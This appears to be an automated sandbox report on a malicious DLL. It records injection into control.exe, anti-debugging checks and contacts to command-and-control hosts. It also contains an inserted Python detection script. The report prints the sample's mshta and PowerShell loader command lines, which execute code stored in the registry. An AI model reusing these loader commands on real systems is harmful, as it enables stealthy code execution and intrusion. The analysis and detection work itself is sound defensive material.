Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7048 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3120 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 604 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4768 Thread sleep count: 7538 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4768 Thread sleep count: 1838 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1320 Thread sleep time: -15679732462653109s >= -30000s
Source: C:\Windows\System32\control.exe TID: 668 Thread sleep time: -1773297476s >= -30000s
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.dll
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 1599
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 1057
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 2880
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 1015
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 544
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 733
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 1856
Source: C:\Windows\SysWOW64\regsvr32.exe Window / User API: threadDelayed 2687
Source: C:\Windows\SysWOW64\regsvr32.exe Window / User API: threadDelayed 1542
Source: C:\Windows\SysWOW64\regsvr32.exe Window / User API: threadDelayed 1728
Source: C:\Windows\SysWOW64\regsvr32.exe Window / User API: threadDelayed 588
Source: C:\Windows\SysWOW64\regsvr32.exe Window / User API: threadDelayed 1716
Source: C:\Windows\SysWOW64\regsvr32.exe Window / User API: threadDelayed 1395
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 559
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 513
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 533
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 376
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 586
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 438
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5010
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 861
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5211
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 585
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7563
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1830
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7538
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1838
Source: C:\Windows\System32\loaddll32.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0102D1A3 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 0_2_0102D1A3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_010259E6 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 0_2_010259E6
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0103F63F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 0_2_0103F63F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053DF63F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 3_2_053DF63F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053CD1A3 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 3_2_053CD1A3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053C59E6 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 3_2_053C59E6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04ABF63F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 4_2_04ABF63F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AAD1A3 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 4_2_04AAD1A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AA59E6 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 4_2_04AA59E6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C3F63F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 5_2_04C3F63F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C259E6 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 5_2_04C259E6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C2D1A3 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 5_2_04C2D1A3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0103E230 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 0_2_0103E230
Source: regsvr32.exe, 00000003.00000003.516252282.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.655416579.00000000032F3000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.654359694.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.655489490.000000000332C000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.471374260.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.515952009.00000000032E9000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.527705942.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.519374746.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517457436.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.520220668.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000002.673893469.0000000003320000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW

Anti Debugging:

Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_010449B3 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey, 0_2_010449B3
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Contains functionality to read the PEB
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A0C57 mov eax, dword ptr fs:[00000030h] 0_2_013A0C57
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A0CA5 mov eax, dword ptr fs:[00000030h] 0_2_013A0CA5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A0CE8 mov eax, dword ptr fs:[00000030h] 0_2_013A0CE8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A0B14 mov eax, dword ptr fs:[00000030h] 0_2_013A0B14
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A0BFC mov eax, dword ptr fs:[00000030h] 0_2_013A0BFC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_030E0B14 mov eax, dword ptr fs:[00000030h] 3_2_030E0B14
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_030E0BFC mov eax, dword ptr fs:[00000030h] 3_2_030E0BFC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_030E0C57 mov eax, dword ptr fs:[00000030h] 3_2_030E0C57
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_030E0CA5 mov eax, dword ptr fs:[00000030h] 3_2_030E0CA5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_030E0CE8 mov eax, dword ptr fs:[00000030h] 3_2_030E0CE8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_006D0CE8 mov eax, dword ptr fs:[00000030h] 4_2_006D0CE8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_006D0BFC mov eax, dword ptr fs:[00000030h] 4_2_006D0BFC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_006D0C57 mov eax, dword ptr fs:[00000030h] 4_2_006D0C57
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_006D0CA5 mov eax, dword ptr fs:[00000030h] 4_2_006D0CA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_006D0B14 mov eax, dword ptr fs:[00000030h] 4_2_006D0B14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_02BF0CA5 mov eax, dword ptr fs:[00000030h] 5_2_02BF0CA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_02BF0CE8 mov eax, dword ptr fs:[00000030h] 5_2_02BF0CE8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_02BF0C57 mov eax, dword ptr fs:[00000030h] 5_2_02BF0C57
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_02BF0BFC mov eax, dword ptr fs:[00000030h] 5_2_02BF0BFC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_02BF0B14 mov eax, dword ptr fs:[00000030h] 5_2_02BF0B14
Checks if the current process is being debugged
Source: C:\Windows\System32\loaddll32.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\regsvr32.exe Process queried: DebugPort
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_010392F6 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 0_2_010392F6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053D92F6 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 3_2_053D92F6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AB92F6 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 4_2_04AB92F6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C392F6 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 5_2_04C392F6

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: berukoneru.website
Source: C:\Windows\SysWOW64\regsvr32.exe Network Connect: 3.20.161.64 187
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 79.110.52.144 187
Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: windows.update3.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 18.219.227.107 187
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 3.12.124.139 187
Maps a DLL or memory area into another process
Source: C:\Windows\System32\loaddll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: unknown protection: execute and read and write
Writes to foreign memory regions
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF60C1112E0
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 8E0000
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\System32\control.exe base: 7FF60C1112E0
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\System32\control.exe base: EC0000
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF60C1112E0
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: ED0000
Allocates memory in foreign processes
Source: C:\Windows\System32\loaddll32.exe Memory allocated: C:\Windows\System32\control.exe base: 8E0000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\System32\control.exe base: EC0000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\System32\control.exe base: ED0000 protect: page execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\loaddll32.exe Thread register set: target process: 5116
Source: C:\Windows\SysWOW64\regsvr32.exe Thread register set: target process: 5952
Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 5832
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3440
Source: C:\Windows\System32\control.exe Thread register set: target process: 6676
Source: C:\Windows\System32\control.exe Thread register set: target process: 4856
Source: C:\Windows\System32\control.exe Thread register set: target process: 4964
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: unknown EIP: 88E31580
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Gxum='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Gxum).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Aw2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Aw2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Acrf='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Acrf).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Sou4='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Sou4).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES391B.tmp" "c:\Users\user\AppData\Local\Temp\jtmpm3o0\CSCBACB7DE77FE24526BA1047DDC177EBA6.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4531.tmp" "c:\Users\user\AppData\Local\Temp\kon0vos3\CSCE7DAF0804EB6B39EE1E6CAB9C626.TMP"
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5221.tmp" "c:\Users\user\AppData\Local\Temp\hupbkl0t\CSC47FEF1B1BE13496F9299275D8347BD99.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5A7E.tmp" "c:\Users\user\AppData\Local\Temp\wnczrnms\CSC2E55B817A1C42F79C3F14C28684A599.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: unknown unknown
Source: control.exe, 0000002A.00000000.636220674.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.611936251.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.654227363.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.601923838.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002B.00000000.600743349.000001C8AB5E0000.00000002.00020000.sdmp, control.exe, 0000002B.00000000.635430988.000001C8AB5E0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: control.exe, 0000002A.00000000.636220674.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.611936251.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.654227363.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.601923838.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002B.00000000.600743349.000001C8AB5E0000.00000002.00020000.sdmp, control.exe, 0000002B.00000000.635430988.000001C8AB5E0000.00000002.00020000.sdmp Binary or memory string: Progman
Source: control.exe, 0000002A.00000000.636220674.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.611936251.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.654227363.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.601923838.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002B.00000000.600743349.000001C8AB5E0000.00000002.00020000.sdmp, control.exe, 0000002B.00000000.635430988.000001C8AB5E0000.00000002.00020000.sdmp Binary or memory string: &Program Manager
Source: control.exe, 0000002A.00000000.636220674.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.611936251.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.654227363.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.601923838.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002B.00000000.600743349.000001C8AB5E0000.00000002.00020000.sdmp, control.exe, 0000002B.00000000.635430988.000001C8AB5E0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
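The csc.exe to cvtres.exe chain above, with both the /OUT target and the CSC*.TMP source sitting under AppData\Local\Temp, is what an in-memory C# compile from a script host (typically PowerShell Add-Type) looks like on the process tree. The following is an added example, not part of the sandbox report, that turns that observation into detection logic: it parses report lines of the form "Source: <parent> Process created: <image> <command line>" and flags compiler launches whose command line points into a user or system temp folder, unless the parent is a known build tool. The folder list, the compiler list and the build-tool allow-list are assumptions to tune per estate; the first two sample lines are quoted from the report, the other two are constructed.

```python
import re

# Report lines of the form "Source: <parent image> Process created: <image> <command line>".
# The first two are quoted from the report above; the third (a Visual Studio build) and the
# fourth (an unresolved child process) are constructed for this example.
PROCESS_LINES = [
    r'Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5221.tmp" "c:\Users\user\AppData\Local\Temp\hupbkl0t\CSC47FEF1B1BE13496F9299275D8347BD99.TMP"',
    r'Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5A7E.tmp" "c:\Users\user\AppData\Local\Temp\wnczrnms\CSC2E55B817A1C42F79C3F14C28684A599.TMP"',
    r'Source: C:\Program Files\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe csc.exe /noconfig /out:C:\src\app\obj\Debug\app.dll C:\src\app\Program.cs',
    r'Source: C:\Windows\System32\control.exe Process created: unknown unknown',
]

# Assumptions (tune per environment): compiler images worth watching, staging folders that
# script-driven compiles use, and parents that legitimately drive the compilers.
COMPILERS = ("\\csc.exe", "\\vbc.exe", "\\cvtres.exe")
TEMP_FOLDERS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\", "\\users\\public\\")
BUILD_TOOL_PARENTS = ("\\devenv.exe", "\\msbuild.exe", "\\dotnet.exe")

# Parent path may contain spaces (lazy match up to the literal separator); the created
# image in these reports never does, the command line is everything after it.
REPORT_LINE = re.compile(
    r"^Source: (?P<parent>.+?) Process created: (?P<image>\S+) (?P<cmdline>.*)$"
)


def parse_report_line(line):
    """Return {"parent_image", "image", "cmdline"} for a process-creation line, else None."""
    m = REPORT_LINE.match(line.strip())
    if not m:
        return None
    return {
        "parent_image": m.group("parent"),
        "image": m.group("image"),
        "cmdline": m.group("cmdline"),
    }


def is_suspicious_compile(event):
    """True when a compiler is launched with temp-folder input/output by a non-build-tool parent."""
    image = event["image"].lower()
    if not image.endswith(COMPILERS):
        return False
    # Secondary filter: IDE/MSBuild-driven compiles are expected; the folder test below is
    # the primary discriminator, since real builds write to project obj\ folders, not %TEMP%.
    if event["parent_image"].lower().endswith(BUILD_TOOL_PARENTS):
        return False
    cmdline = event["cmdline"].lower()
    return any(folder in cmdline for folder in TEMP_FOLDERS)


def triage(lines):
    """Parse every line and return the events that match the temp-folder compile pattern."""
    hits = []
    for line in lines:
        event = parse_report_line(line)
        if event is not None and is_suspicious_compile(event):
            hits.append(event)
    return hits


if __name__ == "__main__":
    for hit in triage(PROCESS_LINES):
        print(f"{hit['parent_image']} -> {hit['image']}")
        print(f"    {hit['cmdline']}")
```

The same predicate applies unchanged to Sysmon event 1 or EDR process-creation records once they are mapped onto the three fields; the report-line parser is only there so the example runs on the evidence shown above.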

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
